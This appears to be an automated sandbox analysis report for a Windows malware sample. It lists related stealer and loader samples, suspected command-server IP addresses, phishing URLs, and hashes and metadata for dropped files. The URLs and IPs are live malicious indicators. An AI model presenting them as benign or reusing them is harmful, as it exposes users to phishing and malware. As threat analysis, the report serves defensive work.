| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
74954a0c86284d0d6e1c4efefe92b521 | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 172.67.187.100
| Setup_10024.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
| ha9wYxkNI7.lnk | Get hash | malicious | XWorm | Browse | 172.67.187.100
| 9KO1ScZ376.lnk | Get hash | malicious | XWorm | Browse | 172.67.187.100
| U4hM4c3l4m.lnk | Get hash | malicious | Unknown | Browse | 172.67.187.100
| f1w58Se3jL.lnk | Get hash | malicious | Unknown | Browse | 172.67.187.100
| 6EFA6YABDc.lnk | Get hash | malicious | Unknown | Browse | 172.67.187.100
| 1ehTzqaTXV.lnk | Get hash | malicious | Unknown | Browse | 172.67.187.100
| Document.pdf.lnk | Get hash | malicious | Bitter Elephant | Browse | 172.67.187.100
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exe | Get hash | malicious | AgentTesla | Browse | 140.82.121.3
| https://effective-teammates-567500.framer.app/ | Get hash | malicious | HTMLPhisher | Browse | 140.82.121.3
| https://main.d3engbxc9elyir.amplifyapp.com/ | Get hash | malicious | Unknown | Browse | 140.82.121.3
| file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 140.82.121.3
| Richardson Electronics, LTD. PRD10221301UUE.exe | Get hash | malicious | AgentTesla | Browse | 140.82.121.3
| PURCHASE ORDER ADDISON-6378397379UUE.exe | Get hash | malicious | AgentTesla | Browse | 140.82.121.3
| http://polskie-torrenty.eu/redir.php?url=https://globalfinanceweb.com%2FProfile%2Fluig%2Fnzx0k%2FmProtect.html%23abrumley@highlandfunds.com | Get hash | malicious | Unknown | Browse | 140.82.121.3
| file.exe | Get hash | malicious | Unknown | Browse | 140.82.121.3
| file.exe | Get hash | malicious | Unknown | Browse | 140.82.121.3
| rQuotation3200025006.exe | Get hash | malicious | AgentTesla | Browse | 140.82.121.3
a0e9f5d64349fb13191bc781f81f42e1 | FoS5cjKhd3.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 172.67.187.100
| file.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| bfINGx7hvL.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| kewyIO69TI.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| bfINGx7hvL.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| gZzI6gTYn4.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| U6b3tLFqN5.exe | Get hash | malicious | LummaC | Browse | 172.67.187.100
| FACTORY NEW PURCHASE ORDER.doc | Get hash | malicious | Unknown | Browse | 172.67.187.100
| Dev_Project.xls | Get hash | malicious | Unknown | Browse | 172.67.187.100
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse |
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse |
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse |
Process: C:\Users\user\AppData\Local\Temp\miner2.0.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.355760272568367
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
MD5: FC3575D5BE1A5405683DC33B66D36243
SHA1: 1C816D34B7D5B96E077DC3EF640BA8C7BA370502
SHA-256: 1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
SHA-512: 68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..
Process: C:\Windows\System32\services64.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.355760272568367
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
MD5: FC3575D5BE1A5405683DC33B66D36243
SHA1: 1C816D34B7D5B96E077DC3EF640BA8C7BA370502
SHA-256: 1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
SHA-512: 68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..
Process: C:\Windows\System32\Microsoft\Libs\sihost64.exe
File Type: CSV text
Category: dropped
Size (bytes): 443
Entropy (8bit): 5.347274615985407
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
MD5: F73EF0CF34F9748349B7DC26D23369A1
SHA1: 9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
SHA-256: 6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
SHA-512: C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
Process: C:\Users\user\AppData\Local\Temp\svchost64.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 646
Entropy (8bit): 5.350532275588425
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCDAZDLI4MWuCv:ML9E4KQMsXE4Np/E4K9E4Ks
MD5: D9CA89A021349720070D9515234EA98F
SHA1: 6250FA94AB1D87D655C60185FACC639EE1E0B929
SHA-256: 08757D7C558DCA49E7A21644675009292CBA4DF6624FB85B6DF0E90E7198D6A4
SHA-512: 5419EACD79DF0BAA7A3CEB5FCC4AA85FC882081C2B6793219F296B9649FE5BC6884FD6F64199FB7C411443DA1D44C79CD129B9AB1CBA22E656A5C91DF92F0F05
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 435820
Entropy (8bit): 5.87360608417321
Encrypted: false
SSDEEP: 6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
MD5: 7DF3608AE8EA69762C71DA1C05F0C043
SHA1: 164A36D4822BE3FD4111CDEF5CECAD5F19024564
SHA-256: ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
SHA-512: E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
Malicious: true
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 435820
Entropy (8bit): 5.87360608417321
Encrypted: false
SSDEEP: 6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
MD5: 7DF3608AE8EA69762C71DA1C05F0C043
SHA1: 164A36D4822BE3FD4111CDEF5CECAD5F19024564
SHA-256: ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
SHA-512: E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
Malicious: true
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....
Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1862656
Entropy (8bit): 7.950142025223752
Encrypted: false
SSDEEP: 49152:Rf036dyCkdyKg1Il+5elMr8JYPDaLObL:R06dyR9oIlFlMr5V
MD5: DC730EEA0EBA910485703A74D173F8E2
SHA1: 093F63548D7366B6C3CBFC3DDFCA453199E40ECA
SHA-256: 18894A1A879E0E75C33EC7988C8835B20B42A3FAE8C51F1CB4F026F2B855A6B7
SHA-512: F1726FAE08F206B07AC87ECF890059E98B110A1DB0C72ADD91B89EBBBB5E8D431AACFE31C37028DB3CF52EEFB7A6BDFC137122B82C7B10DD87E6800A641F933D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@..........................@J..........@.................................W...k.............................I...............................I..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...nataabbx.`....0..R..................@...ijueevze......J......F..............@....taggant.0....J.."...J..............@...........................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 435820
Entropy (8bit): 5.87360608417321
Encrypted: false
SSDEEP: 6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
MD5: 7DF3608AE8EA69762C71DA1C05F0C043
SHA1: 164A36D4822BE3FD4111CDEF5CECAD5F19024564
SHA-256: ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
SHA-512: E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
Malicious: true
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):283
                                                                                                                                                                Entropy (8bit):4.915573758797463
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:ZDlzq9NqBVhusd3MEnownCfrV5ug5pVFBzL5LHi4KqGUC:LzqaBTusdnnoymV5RLFBvI4KqrC
                                                                                                                                                                MD5:218C7FCF8EAEFB826A73316798728FA6
                                                                                                                                                                SHA1:11E726ED3FAFE4DF0294EBF79762CD738F23DB0B
                                                                                                                                                                SHA-256:9BF121B6678247E3A940BAB11800060D34AB2C351A85B99BD48B9526067A3C0E
                                                                                                                                                                SHA-512:94403D19338C12CDE98154E379D6B1EE52D289E61085596D4B8E2D5047F38F7BBA7DE6DB8F05AD7693A5B7996D1BEFA285A55B6C0334DC37D6AE7C7723FC6AF7
                                                                                                                                                                Malicious:false
